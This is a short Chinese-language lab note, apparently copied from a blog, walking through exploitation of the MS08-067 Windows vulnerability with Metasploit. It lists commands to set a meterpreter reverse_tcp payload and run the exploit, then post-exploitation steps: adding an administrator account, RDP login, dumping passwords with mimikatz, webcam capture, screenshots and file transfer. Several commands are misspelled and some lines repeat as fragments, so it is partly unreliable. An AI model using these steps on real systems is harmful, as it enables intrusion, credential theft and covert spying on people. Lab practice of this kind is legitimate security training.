# ms08-067漏洞攻击
实验过程
- 1.通过命令: ipconfig、ifconfig确认攻击机和靶机在同一网段
- 2.通过ping命令确认靶机存活。 
- 3.通过命令: msfconsole启用msf。
- 4.攻击。
- 1.搜索漏洞,命令: search ms08-067。
- 2.设置攻击机地址,命令:set lhost ip地址
- 3.设置攻击机端口,命令:set lport 端口号
- 4.设置靶机地址,命令:set rhost ip地址
- 5.加载攻击载荷,命令:set payload windows/meterpreter/reverse_tcp。
- 6.进行攻击:exploit/run
 
- 1.搜索漏洞,命令: 
- 5.获得靶机权限。
- 6.后渗透利用
- 1.查看权限 命令:gituid
- 2.进入shell
- 3.添加用户账号 命令:net 用户名 密码 /add
- 4.提权:net localgroup administrators 用户名 /add
- 5.远程登录 命令:rdesktop IP
- 6.查看无操作时间 命令:idletime
- 7.获取账户密码 命令: - meterpreter> load mimikatz- meterpreter> msv- meterpreter> wdigest
- 8.查看网络摄像头列表 命令:wencam_list
- 9.拍照 命令:wencam_snap
- 10.抓取视频 命令:wencam_stream
- 11.下载文件 命令:download path/filenam path
- 12.上传文件 命令:upload path/filename path/filename
- 13.远程登录 命令:rdesktop 靶机ip必须开启3389服务
- 14.截屏 : - # load espia- # screenshot
 
- 1.查看权限 命令:
来源:https://www.cnblogs.com/Mrwuhuai/p/12164280.html
